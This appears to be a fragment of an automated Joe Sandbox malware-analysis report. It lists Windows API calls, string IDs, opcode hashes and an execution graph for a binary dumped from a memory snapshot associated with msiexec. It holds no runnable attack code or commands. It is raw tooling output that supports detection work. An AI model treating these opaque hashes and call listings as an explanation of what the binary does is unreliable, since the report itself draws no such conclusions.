                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memcpy$DialogHandleModuleParam
                      • String ID:
                      • API String ID: 1386444988-0
                      • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                      • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                      • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                      • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: ??3@
                      • String ID:
                      • API String ID: 613200358-0
                      • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                      • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                      • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                      • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                      APIs
                      • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                      • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: InvalidateMessageRectSend
                      • String ID: d=E
                      • API String ID: 909852535-3703654223
                      • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                      • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                      • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                      • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                      APIs
                      • wcschr.MSVCRT ref: 0040F79E
                      • wcschr.MSVCRT ref: 0040F7AC
                        • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                        • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: wcschr$memcpywcslen
                      • String ID: "
                      • API String ID: 1983396471-123907689
                      • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                      • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                      • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                      • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                      APIs
                        • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                      • _memicmp.MSVCRT ref: 0040C00D
                      • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: FilePointer_memicmpmemcpy
                      • String ID: URL
                      • API String ID: 2108176848-3574463123
                      • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                      • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                      • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                      • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                      APIs
                      • _snwprintf.MSVCRT ref: 0040A398
                      • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: _snwprintfmemcpy
                      • String ID: %2.2X
                      • API String ID: 2789212964-323797159
                      • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                      • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                      • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                      • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: _snwprintf
                      • String ID: %%-%d.%ds
                      • API String ID: 3988819677-2008345750
                      • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                      • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                      • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                      • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                      APIs
                      • memset.MSVCRT ref: 0040E770
                      • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: MessageSendmemset
                      • String ID: F^@
                      • API String ID: 568519121-3652327722
                      • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                      • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                      • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                      • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: PlacementWindowmemset
                      • String ID: WinPos
                      • API String ID: 4036792311-2823255486
                      • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                      • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                      • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                      • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                      APIs
                      • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                      • DeleteObject.GDI32(00000000), ref: 004125E7
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: ??3@DeleteObject
                      • String ID: r!A
                      • API String ID: 1103273653-628097481
                      • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                      • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                      • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                      • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                      APIs
                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                      • wcsrchr.MSVCRT ref: 0040DCE9
                      • wcscat.MSVCRT ref: 0040DCFF
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: FileModuleNamewcscatwcsrchr
                      • String ID: _lng.ini
                      • API String ID: 383090722-1948609170
                      • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                      • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                      • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                      • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                      APIs
                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                      • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                      • String ID: SHGetSpecialFolderPathW$shell32.dll
                      • API String ID: 2773794195-880857682
                      • Opcode ID: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                      • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                      • Opcode Fuzzy Hash: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                      • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                      APIs
                      • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                      • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                      • memset.MSVCRT ref: 0042BAAE
                      • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memcpy$memset
                      • String ID:
                      • API String ID: 438689982-0
                      • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                      • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                      • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                      • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                      APIs
                        • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                      • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                      • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                      • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                      • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: ??2@$memset
                      • String ID:
                      • API String ID: 1860491036-0
                      • Opcode ID: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                      • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                      • Opcode Fuzzy Hash: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                      • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                      APIs
                      • wcslen.MSVCRT ref: 0040A8E2
                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                      • free.MSVCRT ref: 0040A908
                      • free.MSVCRT ref: 0040A92B
                      • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: free$memcpy$mallocwcslen
                      • String ID:
                      • API String ID: 726966127-0
                      • Opcode ID: 9067421bb5060c399d83e8366b459fd1559f14f7a756e12873c92b79cc47865f
                      • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                      • Opcode Fuzzy Hash: 9067421bb5060c399d83e8366b459fd1559f14f7a756e12873c92b79cc47865f
                      • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                      APIs
                      • wcslen.MSVCRT ref: 0040B1DE
                      • free.MSVCRT ref: 0040B201
                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                      • free.MSVCRT ref: 0040B224
                      • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: free$memcpy$mallocwcslen
                      • String ID:
                      • API String ID: 726966127-0
                      • Opcode ID: a695ade3a7797f376f201de80decb40066d5f736b135f44090dc4a6cd17a09b2
                      • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                      • Opcode Fuzzy Hash: a695ade3a7797f376f201de80decb40066d5f736b135f44090dc4a6cd17a09b2
                      • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                      APIs
                      • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                        • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                        • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                        • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                      • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                      • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                      • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memcmp$memcpy
                      • String ID:
                      • API String ID: 231171946-0
                      • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                      • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                      • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                      • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                      APIs
                      • strlen.MSVCRT ref: 0040B0D8
                      • free.MSVCRT ref: 0040B0FB
                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                      • free.MSVCRT ref: 0040B12C
                      • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: free$memcpy$mallocstrlen
                      • String ID:
                      • API String ID: 3669619086-0
                      • Opcode ID: ee8347e84c53985be3907e5f73125604e6f6c519928a85103321f6ac1e1b5c7d
                      • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                      • Opcode Fuzzy Hash: ee8347e84c53985be3907e5f73125604e6f6c519928a85103321f6ac1e1b5c7d
                      • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                      APIs
                      • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: ??2@
                      • String ID:
                      • API String ID: 1033339047-0
                      • Opcode ID: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                      • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                      • Opcode Fuzzy Hash: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                      • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                      APIs
                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                      • malloc.MSVCRT ref: 00417407
                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                      • free.MSVCRT ref: 00417425
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide$freemalloc
                      • String ID:
                      • API String ID: 2605342592-0
                      • Opcode ID: 6a58532d87bfe5be5798e7c18fd69f9a5c0a4facd7f09204bf7deacabde6e419
                      • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                      • Opcode Fuzzy Hash: 6a58532d87bfe5be5798e7c18fd69f9a5c0a4facd7f09204bf7deacabde6e419
                      • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: wcslen$wcscat$wcscpy
                      • String ID:
                      • API String ID: 1961120804-0
                      • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                      • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                      • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                      • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                      Execution Graph

                      Execution Coverage:2.1%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:0.5%
                      Total number of Nodes:761
                      Total number of Limit Nodes:20
                      execution_graph 34016 40fc40 70 API calls 34192 403640 21 API calls 34017 427fa4 42 API calls 34193 412e43 _endthreadex 34194 425115 76 API calls __fprintf_l 34195 43fe40 133 API calls 34020 425115 83 API calls __fprintf_l 34021 401445 memcpy memcpy DialogBoxParamA 34022 440c40 34 API calls 33240 444c4a 33259 444e38 33240->33259 33242 444c56 GetModuleHandleA 33245 444c68 __set_app_type __p__fmode __p__commode 33242->33245 33244 444cfa 33246 444d02 __setusermatherr 33244->33246 33247 444d0e 33244->33247 33245->33244 33246->33247 33260 444e22 _controlfp 33247->33260 33249 444d13 _initterm __getmainargs _initterm 33250 444d6a GetStartupInfoA 33249->33250 33252 444d9e GetModuleHandleA 33250->33252 33261 40cf44 33252->33261 33256 444dcf _cexit 33258 444e04 33256->33258 33257 444dc8 exit 33257->33256 33259->33242 33260->33249 33312 404a99 LoadLibraryA 33261->33312 33263 40cf60 33264 40cf64 33263->33264 33320 410d0e 33263->33320 33264->33256 33264->33257 33266 40cf6f 33324 40ccd7 ??2@YAPAXI 33266->33324 33268 40cf9b 33338 407cbc 33268->33338 33273 40cfc4 33357 409825 memset 33273->33357 33274 40cfd8 33362 4096f4 memset 33274->33362 33279 40d181 ??3@YAXPAX 33281 40d1b3 33279->33281 33282 40d19f DeleteObject 33279->33282 33280 407e30 _strcmpi 33283 40cfee 33280->33283 33386 407948 free free 33281->33386 33282->33281 33285 40cff2 RegDeleteKeyA 33283->33285 33286 40d007 EnumResourceTypesA 33283->33286 33285->33279 33288 40d047 33286->33288 33289 40d02f MessageBoxA 33286->33289 33287 40d1c4 33387 4080d4 free 33287->33387 33291 40d0a0 CoInitialize 33288->33291 33367 40ce70 33288->33367 33289->33279 33384 40cc26 strncat memset RegisterClassA CreateWindowExA 33291->33384 33293 40d1cd 33388 407948 free free 33293->33388 33295 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33385 40c256 PostMessageA 33295->33385 33299 40d061 ??3@YAXPAX 33299->33281 33302 40d084 DeleteObject 33299->33302 33300 40d09e 33300->33291 33302->33281 33304 40d0f9 GetMessageA 33305 40d17b CoUninitialize 33304->33305 33306 40d10d 33304->33306 33305->33279 33307 40d113 TranslateAccelerator 33306->33307 33309 40d145 IsDialogMessage 33306->33309 33310 40d139 IsDialogMessage 33306->33310 33307->33306 33308 40d16d GetMessageA 33307->33308 33308->33305 33308->33307 33309->33308 33311 40d157 TranslateMessage DispatchMessageA 33309->33311 33310->33308 33310->33309 33311->33308 33313 404ac4 GetProcAddress 33312->33313 33314 404aec 33312->33314 33315 404ad4 33313->33315 33316 404add FreeLibrary 33313->33316 33318 404b13 33314->33318 33319 404afc MessageBoxA 33314->33319 33315->33316 33316->33314 33317 404ae8 33316->33317 33317->33314 33318->33263 33319->33263 33321 410d17 LoadLibraryA 33320->33321 33322 410d3c 33320->33322 33321->33322 33323 410d2b GetProcAddress 33321->33323 33322->33266 33323->33322 33325 40cd08 ??2@YAPAXI 33324->33325 33327 40cd26 33325->33327 33328 40cd2d 33325->33328 33396 404025 6 API calls 33327->33396 33330 40cd66 33328->33330 33331 40cd59 DeleteObject 33328->33331 33389 407088 33330->33389 33331->33330 33333 40cd6b 33392 4019b5 33333->33392 33336 4019b5 strncat 33337 40cdbf _mbscpy 33336->33337 33337->33268 33398 407948 free free 33338->33398 33341 407cf7 33343 407a1f malloc memcpy free free 33341->33343 33344 407ddc 33341->33344 33346 407d7a free 33341->33346 33350 407d83 33341->33350 33352 407e04 33341->33352 33402 40796e 7 API calls 33341->33402 33343->33341 33344->33352 33404 407a1f 33344->33404 33346->33341 33350->33341 33403 406f30 malloc memcpy free 33350->33403 33399 407a55 33352->33399 33353 407e30 33354 407e57 33353->33354 33355 407e38 33353->33355 33354->33273 33354->33274 33355->33354 33356 407e41 _strcmpi 33355->33356 33356->33354 33356->33355 33412 4097ff 33357->33412 33359 409854 33417 409731 33359->33417 33363 4097ff 3 API calls 33362->33363 33364 409723 33363->33364 33437 40966c 33364->33437 33451 4023b2 33367->33451 33373 40ced3 33535 40cdda 7 API calls 33373->33535 33374 40cece 33378 40cf3f 33374->33378 33488 40c3d0 memset GetModuleFileNameA strrchr 33374->33488 33378->33299 33378->33300 33380 40ceed 33514 40affa 33380->33514 33384->33295 33385->33304 33386->33287 33387->33293 33388->33264 33397 406fc7 memset _mbscpy 33389->33397 33391 40709f CreateFontIndirectA 33391->33333 33393 4019e1 33392->33393 33394 4019c2 strncat 33393->33394 33395 4019e5 memset LoadIconA 33393->33395 33394->33393 33395->33336 33396->33328 33397->33391 33398->33341 33400 407a65 33399->33400 33401 407a5b free 33399->33401 33400->33353 33401->33400 33402->33341 33403->33350 33405 407a38 33404->33405 33406 407a2d free 33404->33406 33411 406f30 malloc memcpy free 33405->33411 33407 407a44 33406->33407 33410 40796e 7 API calls 33407->33410 33409 407a43 33409->33407 33410->33352 33411->33409 33428 406f96 GetModuleFileNameA 33412->33428 33414 409805 strrchr 33415 409814 33414->33415 33416 409817 _mbscat 33414->33416 33415->33416 33416->33359 33429 44b090 33417->33429 33422 40930c 3 API calls 33423 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33422->33423 33424 4097c5 LoadStringA 33423->33424 33425 4097db 33424->33425 33425->33424 33426 4097f3 33425->33426 33436 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33425->33436 33426->33279 33428->33414 33430 40973e _mbscpy _mbscpy 33429->33430 33431 40930c 33430->33431 33432 44b090 33431->33432 33433 409319 memset GetPrivateProfileStringA 33432->33433 33434 409374 33433->33434 33435 409364 WritePrivateProfileStringA 33433->33435 33434->33422 33435->33434 33436->33425 33447 406f81 GetFileAttributesA 33437->33447 33439 409675 33440 4096ee 33439->33440 33441 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33439->33441 33440->33280 33448 409278 GetPrivateProfileStringA 